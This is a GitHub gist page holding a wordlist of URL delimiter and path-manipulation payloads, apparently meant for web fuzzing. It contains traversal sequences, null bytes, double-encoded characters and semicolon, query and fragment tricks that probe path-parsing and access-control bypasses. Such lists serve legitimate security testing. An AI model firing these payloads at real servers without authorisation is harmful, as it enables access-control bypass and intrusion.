Skip to content

Instantly share code, notes, and snippets.

@attacker-codeninja

attacker-codeninja/gist:b1d3586c62effdaacdf017b56ecf4ee8

Forked from freyxfi/gist:96c8b05da186cdc684b50a10ae3add38
Created December 15, 2024 01:02
Show Gist options
  • Save attacker-codeninja/b1d3586c62effdaacdf017b56ecf4ee8 to your computer and use it in GitHub Desktop.
Save attacker-codeninja/b1d3586c62effdaacdf017b56ecf4ee8 to your computer and use it in GitHub Desktop.
Download ZIP
delimiters and URL manipulation payloads by @freyxfi
Raw
gistfile1.txt
/
//
/./
/../
/~/
/;/
/\\
/.././
/././
/.
/.../
/..../
/./..
/~
/~user
/~test
/test/../
/test/.
/test//
//slash/%2e/
?
?/
?.
?..
?../
?//
?;
?=
?&
?%00
?%2e
?=test
?q=../
?q=/
?key=//
?../test
?/../
?%252e
?q=example
?/null
;
;/
;?
;;
;.
;..
;%2e
;=
;test
;/..
;foo=bar
;/test/
;q=%00
;key=../
;double;;semicolon
;param;
;param=value
;/%2e
;%252e
;foo%00bar
#
#/
#?
#;
#//
#=
#null
#key=value
#foo
#bar/
#test%00
#test/../
#%2e
#test//double
#path
#/%2e
#value%00
#..
#query=../
#%252e
=
=;
=/
=?
=//
=test
=../
=null
=%00
=%2e
=fakepath
=foobar
=foo&bar
=value=
=//../
=slash/
=dot.
=param
=%252e
=param=../
&
&/
&;
&?
&=
&&
&null
&foo=../
&bar=%2e
&param=
&%00
&key=value
&foo/bar
&test..
&dot..slash
&empty
&%252e
&slash/
&%2f..
&query
\
\\
\;
\?
\/
\..
\%2e
\=
\&
\#
\\..\\
\slash
\null
\test
\../..
\q=../
\;%00
\&../
\\test
\\%252e
%00
%00/
%00;
%00?
%00=
%00&
%00#
%00%2e
%00..
%00null
%00/test
%00../
%00param
%00key
%00path
%00dot
%00;null
%00%252e
%00slash
%00fake
%2e
%2f
%3b
%3f
%3d
%26
%23
%5c
%7e
%09
%20
%25
%3a
%40
%00%00
%2e%2e
%252f
%252e
%5f
%5e
%2d
%3c
%3e
%7b
%7d
%7c
%22
%27
%60
%2b
%2d
%23%00
%3b%00
%2e%00
%2f%00
%252f..
%252e%252e
%252e/
%252f/
%252e%00
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment